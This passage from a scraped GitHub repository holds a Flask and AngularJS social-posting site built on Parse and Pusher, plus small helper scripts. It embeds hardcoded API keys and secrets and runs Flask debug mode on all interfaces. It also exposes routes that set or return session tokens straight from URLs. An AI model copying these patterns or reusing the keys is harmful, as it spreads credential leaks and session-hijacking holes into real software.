Flask(__name__)\nTriangle(app)\napp.config['UPLOAD_FOLDER'] = 'uploads/'\n\nHackathon = Blueprint('Hackathon', __name__,\n template_folder='templates',subdomain=\"hack404\")\napp.register_blueprint(Hackathon)\n\n\[email protected]_request\ndef make_session_permanent():\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=46440)\n\[email protected]('/',methods=['GET', 'POST'])\ndef index():\n #\tsettings_local.initParse()\n\t# if request.method == 'POST' and request.form[\"what\"]== 'Login':\n\t# \ttry:\n\t# \t\tprint request.form[\"password\"]\n\t# \t\tu = User.login(request.form[\"username\"],request.form[\"password\"])\n\t# \t\tsession['session_token'] = u.sessionToken\n\t# \t\tresp = make_response(render_template(\"index.html\"))\n\t# \t\treturn resp\n\t# \texcept:\n\t# \t\treturn render_template('login.html',error=\"Invalid username or password\")\n\t# elif request.method == 'POST' and request.form[\"what\"]=='SignUp':\n\t# \temail = request.form[\"email\"]\n\t# \tpassword = request.form[\"password\"]\n\t# \tninja = request.form[\"ninja\"]\n\t# \tbirthdate = request.form[\"birthdate\"]\n\t# \tu = User.signup(email,password)\n\t# \tu.email=email\n\t# \tu.save()\n\t# \t# proPic.save(os.path.join(app.config['UPLOAD_FOLDER']),\"userdp.png\")\n\t\t# connection = httplib.HTTPSConnection('api.parse.com', 443)\n\t\t# connection.connect()\n\t\t# connection.request('POST', '/1/files/profilePic.png', open('userdp.png', 'rb').read(), {\n\t\t# \"X-Parse-Application-Id\": \"${Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4}\",\n\t\t# \"X-Parse-REST-API-Key\": \"${nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO}\",\n\t\t# \"Content-Type\": \"image/png\"\n\t\t# })\n\t\t# result = json.loads(connection.getresponse().read())\n\t\t# print result\n\t\t# connection.request('POST', '/1/classes/_User', json.dumps({\n\t\t# \"username\": email,\n\t\t# \"picture\": {\n\t\t# \"name\": \"profilePic.png\",\n\t\t# \"__type\": \"File\"\n\t\t# }\n\t\t# }), {\n\t\t# \"X-Parse-Application-Id\": \"${Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4}\",\n\t\t# \"X-Parse-REST-API-Key\": \"${nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO}\",\n\t\t# \"Content-Type\": \"application/json\"\n\t\t# })\n\t\t# result = json.loads(connection.getresponse().read())\n\t\t# print result\n\t# \tsession['session_token'] = u.sessionToken\n\t# \tresp = make_response(render_template(\"index.html\"))\n\t# \treturn u.sessionToken\n\t# else:\n\t# \tif session.get('session_token') is None:\n\t# \t\tprint \"nohhh\"\n\t# \t\treturn render_template('login.html')\n\t# \telse:\n\t# \t\tprint \"yes\"\n\t# \t\treturn render_template('index.html')\n # print \"hack\"\n\treturn render_template('Error.html')\n\[email protected]('/hack404')\ndef hackathon():\n return render_template('hackathon.html')\n\[email protected]('/js/<path:path>')\ndef send_js(path):\n\tprint path\n\treturn send_from_directory('js', path)\n\[email protected]('/assets/images/<path:path>')\ndef send_from_assets_images(path):\n print path\n return send_from_directory('assets/images', path)\n\[email protected]('/assets/javascripts/<path:path>')\ndef send_from_assets_js(path):\n print path\n return send_from_directory('assets/javascripts', path)\n\[email protected]('/assets/stylesheets/<path:path>')\ndef send_from_assets_css(path):\n print path\n return send_from_directory('assets/stylesheets', path)\n\[email protected]('/mobileLogin')\ndef mobileLogin():\n if session.get('session_token') is None:\n return render_template('mlogin.html')\n\[email protected]('/css/<path:path>')\ndef 
send_css(path):\n\tprint path\n\treturn send_from_directory('css', path)\n\[email protected]('/font/<path:path>')\ndef send_font(path):\n\tprint path\n\treturn send_from_directory('font', path)\n\[email protected]('/NewUpdate/<objectId>')\ndef NewUpdate(objectId):\n p = pusher.Pusher(app_id='173885',key='2f8f1cab459e648a27fd',secret='80905f147470664954bd',ssl=True,port=443)\n p.trigger('PostChannel', 'NewUpdate', {'message': objectId})\n return \"success\"\n\n\[email protected]('/images/<path:path>')\ndef send_images(path):\n\tprint path\n\treturn send_from_directory('images', path)\n\[email protected]('/Icons/<path:path>')\ndef Icons(path):\n\tprint path\n\treturn send_from_directory('Icons', path)\n\[email protected]('/logout')\ndef logout():\n\t# session.Abandon()\n\tsession.clear()\n\treturn redirect(url_for('index'))\n\ndef GetCurrentUser():\n\ttoken = session.get('session_token')\n\tsettings_local.initParse(token)\n\tme = User.current_user()\n\treturn me\n\[email protected]('/setSession/<path:path>')\ndef setSession(path):\n\tsession['session_token'] = path\n\treturn render_template('index.html')\n\[email protected]('/GetSessionToken')\ndef GetSessionToken():\n\ttoken = session.get('session_token')\n\treturn str(token)\n\[email protected]('/GetUserInterests')\ndef GetUserInterests():\n\td = []\n\tGetCurrentUser()\n\tuser_interest_function = Function(\"GetUserIntrest\")\n\td = user_interest_function()\n\treturn json.dumps(d)\n\[email protected]('/Profile')\ndef Profile():\n if session.get('session_token') != None:\n return render_template('profile.html')\n else:\n return render_template('login.html')\n\[email protected]('/Select_Interests')\ndef Select_Interests():\n if session.get('session_token') != None:\n return render_template('Settings.html')\n else:\n return render_template('login.html')\n\[email protected]('/share/<path:path>')\ndef share(path):\n SinglePost = getPost.getSinglePost(path)\n return render_template('Posts.html',SinglePost=SinglePost)\n\[email protected]('/Settings')\ndef Settings():\n\treturn render_template('Settings.html')\n\[email protected]('/download')\ndef download():\n\treturn render_template('Error.html')\n\nport = int(os.environ.get('PORT', 5000))\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\napp.run(host=\"0.0.0.0\",debug=True,port=port)\n\n\n# font images)\n\n\n#font images\n" }, { "alpha_fraction": 0.7622377872467041, "alphanum_fraction": 0.7657342553138733, "avg_line_length": 27.5, "blob_id": "62f78f3fa14a99765ef773d21b5fbdf3b23dc9b4", "content_id": "546131a2fa95f80bae1149dc9cd49eafa8c4203f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/getPost.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "from parse_rest.datatypes import Object\nimport settings_local\n\ndef getSinglePost(objectId):\n settings_local.initParse()\n className=\"Posts\"\n Posts=Object.factory(className)\n SinglePost=Posts.Query.get(objectId=objectId)\n print SinglePost.Image1.url\n return SinglePost\n\n" }, { "alpha_fraction": 0.47630923986434937, "alphanum_fraction": 0.7057356834411621, "avg_line_length": 15.708333015441895, "blob_id": "2e3852d89487488dc8db3caa49287e45f55e1925", "content_id": "b47167c63d19da04c180e6b1b4680ddad4b8905c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 401, "license_type": "no_license", 
"max_line_length": 24, "num_lines": 24, "path": "/requirements.txt", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "cffi==1.5.0\ncryptography==1.2.1\nenum34==1.1.2\nFlask==0.10.1\nFlask-Triangle==0.5.4\nfunctools32==3.2.3.post2\ngunicorn==19.4.5\nidna==2.0\nipaddress==1.0.16\nitsdangerous==0.24\nJinja2==2.8\njsonschema==2.5.1\nMarkupSafe==0.23\nndg-httpsclient==0.4.0\nparse-rest==0.2.20141004\npusher==1.2.3\npyasn1==0.1.9\npycparser==2.14\npyOpenSSL==0.15.1\nrequests==2.9.1\nsix==1.10.0\nurllib3==1.14\nWerkzeug==0.11.3\nwheel==0.24.0\n" }, { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 23.5, "blob_id": "cc96392561bb672e9eebef2d75d924dc4df1f923", "content_id": "83970e5afba48b22e8f45a5fa414cbdd35ac4a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 49, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "#Punchit.io website \n# Punchit.io_website_master\n" }, { "alpha_fraction": 0.5850793123245239, "alphanum_fraction": 0.58977872133255, "avg_line_length": 27.691011428833008, "blob_id": "c892e846422dea2a83ba45eb8fd14fa45a0f100e", "content_id": "9577360b647e37ea5805d8e7997d66db62a8d56a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5107, "license_type": "no_license", "max_line_length": 152, "num_lines": 178, "path": "/js/SettingsController.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "var app = angular.module('app',['app.controllers','app.factory'])\n\napp.controller(\"MainController\",function($scope){\n\n});\n\napp.controller(\"FriendsController\",['$scope','GetFacebookFriends','GetFriendsFromInterests',function($scope,GetFacebookFriends,GetFriendsFromInterests){\n var promise = GetFacebookFriends.GetFriends()\n promise.then(function(Data){\n for(var i=0;i<Data.length;i++)\n {\n if(Data[i].isFollowing)\n {\n Data[i].symbol = \"remove\"\n }\n else {\n Data[i].symbol = \"add\"\n }\n }\n $scope.FacebookFriends = Data\n })\n var promise2 = GetFriendsFromInterests.GetFriends()\n promise2.then(function(Data){\n // console.log(Data);\n $scope.intrestBasedFriends = Data\n },function(error){\n console.log(error);\n },function(update){\n //console.log(update);\n $scope.intrestBasedFriends = update\n })\n\n $scope.FollowUnfollowAction = function(d)\n {\n //console.log(d);\n\n var FollowType = Parse.Object.extend(\"FollowList\")\n var FollowObject = new FollowType();\n FollowObject.set(\"Follower\",Parse.User.current())\n User = new Parse.User();\n\t\tUser.id = d.objectId\n FollowObject.set(\"Following\",User)\n FollowObject.set(\"FollowingName\",d.Name)\n if(!d.isFollowing)\n {\n FollowObject.save({success : function(Object) {\n $scope.objectIdOfFollowObject = Object.id\n }})\n d.isFollowing = true\n d.symbol = \"remove\"\n }\n else {\n FollowObject = new FollowType();\n var Query = new Parse.Query(FollowType);\n Query.equalTo(\"Following\",User)\n Query.find({\n success:function(Objects) {\n for(var i=0;i<Objects.length;i++)\n {\n if(Objects[i].get(\"Follower\").id == Parse.User.current().id)\n {\n Objects[i].destroy()\n }\n }\n }\n })\n d.isFollowing = false\n d.symbol = \"add\"\n }\n\n }\n}])\n\napp.controller(\"InterestsController\",['$scope','FetchInterests',function($scope,FetchInterests) {\n var 
promise = FetchInterests.Fetch()\n promise.then(function(Data){\n $scope.Data = Data\n });\n $scope.change = function(d){\n var InterestProto = Parse.Object.extend(\"UserIntrest\")\n\n if(!d.has)\n {\n $scope.leverColor = \"red\"\n var InterestObject = new InterestProto();\n InterestObject.set(\"User\",Parse.User.current())\n var InterestList = Parse.Object.extend(\"Intrestlist\")\n var InterestListObject = new InterestList();\n InterestListObject.id = d.id;\n InterestObject.set(\"HisInterest\",InterestListObject);\n InterestObject.set(\"IntrestText\",d.Text)\n d.has = true\n d.leverColor = \"red\"\n InterestObject.save({\n success:function(Object){console.log(\"Added\");},\n error:function(){console.log(\"Error occured\");}\n })\n }\n else {\n d.has = false\n var Query = new Parse.Query(InterestProto)\n d.leverColor = \"\"\n Query.equalTo(\"User\",Parse.User.current())\n Query.find({\n success:function(response){\n for(var i=0;i<response.length;i++)\n {\n var SingleObject = response[i];\n if(SingleObject.get(\"IntrestText\") == d.Text)\n {\n SingleObject.destroy({\n error : function(error){console.log(error);}\n })\n break;\n }\n }\n },\n error : function(error)\n {\n console.log(error);\n }\n })\n }\n };\n }]);\n\napp.controller(\"EditProfileController\",function($scope){\n var user = Parse.User.current()\n $scope.Email = user.get(\"email\");\n $scope.Ninja_name = user.get(\"Ninja_name\");\n $scope.Name = user.get(\"Name\")\n //alert(user.get('ProfilePicture').url())\n $scope.image = user.get('ProfilePicture').url()\n $scope.update = function(){\n var fileUploadControl = document.getElementsByName('profilePic')[0];\n //console.log(fileUploadControl.files.length)\n if (fileUploadControl.files.length > 0) {\n var file = fileUploadControl.files[0];\n // alert(JSON.stringify(file))\n var name = \"profilePic.png\";\n var parseFile = new Parse.File(name, file);\n parseFile.save().then(function(){\n user.set(\"ProfilePicture\",parseFile);\n user.set(\"email\",$scope.Email)\n user.set(\"Ninja_name\",$scope.Ninja_name)\n user.set(\"Name\",$scope.Name)\n user.save({\n success: function(user){\n Materialize.toast('Your Profile was successfully updated', 3000);\n location.reload()\n },\n error : function(error){\n Materialize.toast(error, 2000);\n }\n });\n\n },function(){})\n }\n else {\n Materialize.toast('Please choose your Profile Picture', 2000);\n }\n }\n})\n\napp.controller(\"ChangePassword\",function($scope){\n $scope.update = function(){\n var user = Parse.User.current()\n if($scope.Pass_con == $scope.Pass_main)\n {\n user.set(\"password\",$scope.Pass_main)\n user.save({\n success : function(user){\n Materialize.toast('Password updated', 3000);\n }\n })\n }\n }\n})\n" }, { "alpha_fraction": 0.641121506690979, "alphanum_fraction": 0.7028037309646606, "avg_line_length": 88.33333587646484, "blob_id": "527b8428136f46856665a47213c052405f2929da", "content_id": "0381f979a1c73785cf3b33e2956268ad33979af4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 535, "license_type": "no_license", "max_line_length": 278, "num_lines": 6, "path": "/images/logos/punchit.io_files/FkQNViGi-sj.js", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "/*!CK:2686195818!*//*1441808114,*/\n\nif (self.CavalryLogger) { CavalryLogger.start_js([\"tLt9Y\"]); }\n\n__d('IntlLithuanianNumberType',['IntlVariations'],function a(b,c,d,e,f,g,h){if(c.__markCompiled)c.__markCompiled();var i={getNumberVariationType:function(j){var 
k=j%100,l=k%10;return l===0||k>10&&k<20?h.NUMBER_DUAL:l===1?h.NUMBER_SINGULAR:h.NUMBER_PLURAL;}};f.exports=i;},null);\n__d('legacy:pages-suggest-ui-nullable',['NullableInput'],function a(b,c,d,e){if(c.__markCompiled)c.__markCompiled();b.NullableInput=c('NullableInput');},3);" }, { "alpha_fraction": 0.618453860282898, "alphanum_fraction": 0.7605984807014465, "avg_line_length": 33.869564056396484, "blob_id": "375952e502352a00b3701552bf058a0dda0bac31", "content_id": "b192365761eb3c0ac972cbb4bd4b2c288cb39484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 802, "license_type": "no_license", "max_line_length": 121, "num_lines": 23, "path": "/Process.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "import requests\nimport sys\nfrom PIL import Image\n\nf = open('Image1.jpg', 'wb')\nurl1 = \"http://files.parsetfss.com/b7dd35dc-b01c-4492-b846-ef2a47bafc6b/tfss-0b3759e3-2265-430a-b033-f8f4421cdaab-Image1\"\nf.write(requests.get(url1).content)\nf.close()\nf1 = open('Image2.jpg', 'wb')\nurl2 = \"http://files.parsetfss.com/b7dd35dc-b01c-4492-b846-ef2a47bafc6b/tfss-0b3759e3-2265-430a-b033-f8f4421cdaab-Image1\"\nf1.write(requests.get(url2).content)\nf1.close()\nbackground = Image.open('images/Share_Pattern.jpg')\nbackground.thumbnail((300,300),Image.ANTIALIAS)\n# background.show()\nimage1 = Image.open('Image1.jpg')\nimage1.thumbnail((75,100),Image.ANTIALIAS)\n# image1.show()\nimage2 = Image.open('Image2.jpg')\nimage2.thumbnail((75,100),Image.ANTIALIAS)\nimage2.show()\nbackground.paste(image1,(40,10))\nbackground.show()\n" }, { "alpha_fraction": 0.7219731211662292, "alphanum_fraction": 0.7219731211662292, "avg_line_length": 30.85714340209961, "blob_id": "9b1e6d55b7141d3e9fff3c2996bb72b5734e33b6", "content_id": "0447e1b307e96b56b82935f03d688a58f1ffc6c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 54, "num_lines": 7, "path": "/settings_local.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "from parse_rest.connection import register\ndef initParse(sessionToken=None):\n\tprint \"init\"\n\tif sessionToken == None:\n\t\tregister('Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4','nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO',master_key=None)\n\telse:\n\t\tregister('Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4','nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO',session_token=sessionToken)\n" } ]
10
clearskky/Scopus_Scrape
https://github.com/clearskky/Scopus_Scrape
2fdf0b8e8e650b749c05ef45ff6aa4a16014e6be
f0af9110c6b18a665de6f3a961d36a2d9973e10c
8914855d0900f44001c6115410a12d464e6e77a4
refs/heads/master
2021-01-26T14:33:56.923301
2020-02-27T06:41:00
2020-02-27T06:41:00
243,449,516
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5965327024459839, "alphanum_fraction": 0.6356711387634277, "avg_line_length": 49.445945739746094, "blob_id": "f1a75eb0a093308c617ec5cbbeb66dce43175435", "content_id": "7e9ff297a8056ec8f69ff0131b843b92f9c0f068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3852, "license_type": "no_license", "max_line_length": 269, "num_lines": 74, "path": "/ScopusScrape.py", "repo_name": "clearskky/Scopus_Scrape", "src_encoding": "UTF-8", "text": "import requests\r\nimport json\r\nfrom bs4 import BeautifulSoup #HTML sayfasını parse etmek için gereken kütüphane\r\nfrom time import sleep \r\n\r\noffset = 1 # URL'de offset parametresi sayfanın başında hangi makalenin yer alacağını belirler. Örneğin offset 41 olduğu zaman sayfada 41-60 arası makaleler listelenir.\r\npubyear = 2019\r\nscopus_1 = \"https://www.scopus.com/results/results.uri?sort=cp-f&src=s&st1=%22human-computer+interaction%22&nlo=&nlr=&nls=&sid=f65b0436cf4718bd9b60238fd65a4454&sot=b&sdt=b&sl=78&s=TITLE-ABS-KEY%28%22human-computer+interaction%22%29+AND+DOCTYPE%28ar%29+AND+PUBYEAR+%3d+\"\r\nscopus_2 = \"&cl=t&offset=\"\r\nscopus_3 = \"&origin=resultslist&ss=cp-f&ws=r-f&ps=r-f&cs=r-f&cc=10&txGid=7575ff4e603f1469d35288c9add1ab14\"\r\narticles = {}\r\n#totalArticleCount = 100\r\n\r\n\r\nhdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\r\n 'Accept-Encoding': 'none',\r\n 'Accept-Language': 'en-US,en;q=0.8',\r\n 'Connection': 'keep-alive'}\r\n\r\nfor k in range(25): #Range * 20 = Elde edilecek makale sayısı. Her sayfada 20 makale yer almakta\r\n myURL = scopus_1 + str(pubyear) + scopus_2 + str(offset) + scopus_3\r\n r = requests.post(url=myURL, headers=hdr)\r\n parsedPage = BeautifulSoup(r.text, \"lxml\")\r\n searchAreas = parsedPage.find_all(\"tr\", attrs={\"class\":\"searchArea\"})\r\n print(len(searchAreas))\r\n for i in range(len(searchAreas)):\r\n #Her makalenin belirli bazı verileri elde edilir\r\n searchArea = searchAreas[i].find(\"a\", attrs={\"class\":\"ddmDocTitle\"})\r\n docTitle = searchArea.get_text()\r\n docLink = searchArea.attrs[\"href\"]\r\n citations = searchAreas[i].find_all(\"td\", attrs={\"class\":\"textRight\"})[1].get_text()\r\n keywords = []\r\n\r\n \r\n print(str(offset+i) + \".ci makalenin sayfasından etiketler çekiliyor\")\r\n\r\n #Makalenin anahtar kelimelerini elde etmek için makalenin sayfasına gidilir\r\n try:\r\n r2 = requests.post(url=docLink, headers=hdr)\r\n parsedArticle = BeautifulSoup(r2.text, \"lxml\")\r\n #print(\"parsedArticle BeautifulSoup nesnesi oluşturuldu\")\r\n authorKeywords = parsedArticle.find(\"section\", attrs={\"id\":\"authorKeywords\"})\r\n #print(\"Keyword'lerin yer aldığı section elde edildi\")\r\n badges = authorKeywords.find_all(\"span\", attrs={\"class\":\"badges\"})\r\n #print(\"Bütün badge'ler bulundu\")\r\n keywords = []\r\n for j in range(len(badges)):\r\n keywords.append(badges[j].get_text())\r\n print(str(offset+i) +\".ci makalenin bütün anahtarlar kelimeleri elde edildi\")\r\n print(\"------------------------------------\")\r\n except:\r\n print(str(offset+i) +\".ci makalenin yazar tarafından verilen etiketleri yok ---------!!!\")\r\n print(\"------------------------------------\")\r\n \r\n \r\n #Bulgular dictionary'nin uygun alanlarına yerleştirilir\r\n \r\n articles[\"article\" + 
str(offset+i)] = {}\r\n articles[\"article\" + str(offset+i)][\"docTitle\"] = docTitle\r\n articles[\"article\" + str(offset+i)][\"docLink\"] = docLink\r\n articles[\"article\" + str(offset+i)][\"citations\"] = citations.strip(\"\\n\")\r\n articles[\"article\" + str(offset+i)][\"keywords\"] = keywords\r\n offset+= 20\r\nprint(\"Bütün bulgular dictionary'e yerleştirildi\")\r\n\r\n\r\n \r\nprint(\"JSON Yazım işlemleri başlıyor\")\r\nwith open(\"scopus500articles2019.json\", \"w\", encoding=\"utf-8\") as jsonFile:\r\n #json.dump(complaints, jsonFile, ensure_ascii=False).encode(\"utf8\")\r\n json.dump(articles, jsonFile)\r\n print(\"Dosya yazım işlemi başarıyla tamamlandı\")\r\n" }, { "alpha_fraction": 0.5679903626441956, "alphanum_fraction": 0.5848375558853149, "avg_line_length": 35.772727966308594, "blob_id": "a7185cc51872b96ff3258c2dfaeebed432fbbaf4", "content_id": "c5fa6a51e1f340a80667b8449be00010007bf756", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 836, "license_type": "no_license", "max_line_length": 100, "num_lines": 22, "path": "/ScopusCitationsCounter.py", "repo_name": "clearskky/Scopus_Scrape", "src_encoding": "UTF-8", "text": "import json\r\n\r\nfile = \"scopus500articles201\"\r\nfileNumber = 5\r\n\r\ncitations = {}\r\nfor i in range(5,10):\r\n targetFile = file + str(i) + \".json\"\r\n with open(targetFile, \"r\") as articles:\r\n articleData = json.load(articles)\r\n for article, data in articleData.items():\r\n year = \"201\" + str(i)\r\n if year not in citations.keys():\r\n citations[year] = int(data[\"citations\"].strip(\"\\n\").strip(\"\\t\"))\r\n else:\r\n citations[year] += int(data[\"citations\"].strip(\"\\n\").strip(\"\\t\"))\r\n \r\n\r\nwith open(\"ArticleCitationCountByYear.json\", \"w\") as destination:\r\n citations = {k: v for k, v in sorted(citations.items(), key=lambda item: item[1], reverse=True)}\r\n json.dump(citations, destination)\r\n print(\"Dosya yazım işlemi başarıyla tamamlandı\")\r\n" }, { "alpha_fraction": 0.5452696084976196, "alphanum_fraction": 0.5666327476501465, "avg_line_length": 35.57692337036133, "blob_id": "7678fcf76a084fa829b7d8beb39deaf3ef841672", "content_id": "5c75f464e486b21ae490f1c60dadfc80137015a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 102, "num_lines": 26, "path": "/ScopusKeywordCounter.py", "repo_name": "clearskky/Scopus_Scrape", "src_encoding": "UTF-8", "text": "import json\r\n\r\nfile = \"scopus500articles201\"\r\nfileNumber = 5\r\n\r\nkeywords = {}\r\nfor i in range(5,10):\r\n targetFile = file + str(i) + \".json\"\r\n with open(targetFile, \"r\") as articles:\r\n articleData = json.load(articles)\r\n for article, data in articleData.items():\r\n for keyword in data[\"keywords\"]:\r\n if len(data[\"keywords\"]) < 1:\r\n keywords[\"noKeywords\"] += 1\r\n if keyword not in keywords:\r\n keywords[keyword] = 1\r\n else:\r\n keywords[keyword] += 1\r\n\r\n destinationFile = \"500ArticleKeywords201\" + str(i) + \".json\"\r\n with open(destinationFile, \"w\") as destination:\r\n keywords = {k: v for k, v in sorted(keywords.items(), key=lambda item: item[1], reverse=True)}\r\n json.dump(keywords, destination)\r\n print(\"Dosya yazım işlemi başarıyla tamamlandı\")\r\n \r\nprint(\"Bütün dosya yazım işlemleri başarıyla tamamlandı\")\r\n \r\n" } ]
3
tkys/fasttext_text_classifier
https://github.com/tkys/fasttext_text_classifier
38bcb9775f548cb634c5e26d0010bb3b737139fa
face711911dc0528c1d2959c3339847ea3dcba9e
50a11bdb92a2f74bf8ac69bfb01d6149275a8748
refs/heads/master
2020-08-08T12:20:18.556333
2019-10-09T11:25:04
2019-10-09T11:25:04
213,830,846
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4791809022426605, "alphanum_fraction": 0.4955631494522095, "avg_line_length": 20.865671157836914, "blob_id": "40ac1ce88cfe4c3a50be4e4e90a0e21f3a474317", "content_id": "8927bda9a4d0f046da97b545cca16c2c73ac0456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1601, "license_type": "no_license", "max_line_length": 88, "num_lines": 67, "path": "/train_data_fasttext.py", "repo_name": "tkys/fasttext_text_classifier", "src_encoding": "UTF-8", "text": "import csv\nimport re\nimport sys\nimport MeCab\n\n# いらない品詞(stop word)があるならばコメントアウト \nhinshi_list = [\n \"名詞\",\n \"動詞\",\n \"形容詞\",\n \"形容動詞\",\n \"記号\",\n \"助詞\",\n \"助動詞\",\n \"副詞\"\n ]\n\n\ndef convert2fasttext(bunrui):\n \"\"\" fastText用のラベルに変換 \"\"\"\n labels = {\n \"1\": \"__label__1\",\n \"2\": \"__label__2\",\n \"3\": \"__label__3\"\n #\"4\": \"__label__4\",\n #\"5\": \"__label__5\"\n }\n return labels[bunrui]\n\ndef convert2wakati(text, tagger):\n\n r=[]\n mojiretu=' '\n \"\"\" わかち書きに変換 \"\"\"\n node = tagger.parseToNode(text)\n\n while node:\n # 単語を取得\n if node.feature.split(\",\")[6] == '*':\n word = node.surface\n else:\n word = node.feature.split(\",\")[6]\n #word = node.surface\n\n # 品詞を取得\n hinshi = node.feature.split(\",\")[0]\n\n if hinshi in hinshi_list:\n r.append(word)\n node = node.next\n\n mojiretu = (' '.join(r)).strip()\n\n return mojiretu\n\ndef main():\n tagger = MeCab.Tagger('-d /usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd')\n with open(sys.argv[1]) as file:\n reader = csv.reader(file)\n for row in reader:\n label = convert2fasttext(row[0])\n comment = convert2wakati(\"\".join(row[1:]), tagger)\n # comment = stopword(comment)\n print(\"{label}, {comment}\\n\".format(label=label, comment=comment), end=\"\")\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6632140874862671, "alphanum_fraction": 0.6782799959182739, "avg_line_length": 21.10416603088379, "blob_id": "0d0441f5dea3b2ab8ec398794a49054b4d5ca91c", "content_id": "ae553fa9424e07cacf126ddca55cce0c44686ad0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5190, "license_type": "no_license", "max_line_length": 165, "num_lines": 144, "path": "/README.md", "repo_name": "tkys/fasttext_text_classifier", "src_encoding": "UTF-8", "text": "# fasttext_text_classifier\n\n Ubuntu 18.04 LTS\n* Python 3\n* MeCab\n* mecab-python3\n* mecab-ipadic-NEologd (MeCabの新語辞書)\n* fasttext\n\n\n\n### MeCab関連の環境構築\n\nmecabインストール、neologd辞書の用意、ipadicとか\n\n```\n$ sudo apt-get install mecab libmecab-dev mecab-ipadic-utf8 git make curl xz-utils file\n\n$ pip3 install mecab-python3\n```\n\n\n## mecab-ipadic-NEologd:MeCabの新語辞書 mecab-ipadic-NEologdのインストール/更新方法\n\n辞書のシードデータは、GitHubリポジトリを介して配布されます。\n\n「git clone」し複製されたリポジトリのディレクトリに移動、\n次のコマンドで、最近のmecab-ipadic-NEologdをインストールまたは更新(上書き)できます。\n\n```\n$ git clone --depth 1 https://github.com/neologd/mecab-ipadic-neologd.git\n$ cd mecab-ipadic-neologd\n$ ./bin/install-mecab-ipadic-neologd -n\n```\n途中のメッセージからmecab-configをインストールした場合は、使用するmecab-configのパスを設定する必要があります。\n\n\n次のヘルプコマンドにてコマンドラインオプションを確認できます。\n\n```\n$ ./bin/install-mecab-ipadic-neologd -h\n```\n\n### neologd辞書の場所を確認\n```\n$ echo `mecab-config --dicdir`\"/mecab-ipadic-neologd\"\n\n/usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd\n```\n\n--------\n### fasttextの環境構築\n\nfastTextのインストールは通常`pip install fasttext `。すごく楽。\nただし今回はオートチューニングを使いたいので、最新リポジトリからもってきてインストール。\n\n```\nautotune is a new feature that is not included in the last 
release (0.9.1). You should install the \"dev\" version, that is, clone the repo\n\n$ git clone https://github.com/facebookresearch/fastText.git\n$ cd fastText\n$ pip install .\n\n```\n\n\n\n--------\n## fasttext用の学習用データの作成\n\n### インプットデータ用意\n\n1行に `{label},{text} `の形式で用意します\n\n* input.txt\n```\n1,変換時に、Stop Wordの処理をしたりしますが、まずはStop Word無しで学習させてみます。\n3,fastTextでクラス分けをする際の教師データは、下記のようなフォーマットなのでcsvから変換します。\n2,教師データとしてはあまり宜しくない感じはしますが、とりあえずfastTextに入力してみます。\n1,精度は、fastTextによって予測されたラベルの中の正しいラベルの数です。リコールは、すべての実際のラベルのうち、正常に予測されたラベルの数です。これをより明確にする例を見てみましょう。\n3,モデルによって予測されるラベルはですfood-safety。これは関係ありません。どういうわけか、モデルは単純な例では失敗するようです。\n```\n\n### fasttext形式ラベルと分かち書き\n以下コマンドにて、 `__label__N,(分かち書き済みテキスト)` の形式で log.txtに出力します。\n```\n$python3 train_data_fasttext.py input.csv > log.txt\n```\n\n\n### log.txt の確認\n\n```\n$cat log.txt\n__label__1, 変換 時 に 、 Stop Word の 処理 を する たり する ます が 、 Stop Word 無し で 学習 する せる て みる ます 。\n__label__3, fastText で クラス 分け を する 際 の 教師 データ は 、 下記 の よう だ フォーマット だ ので CSV から 変換 する ます 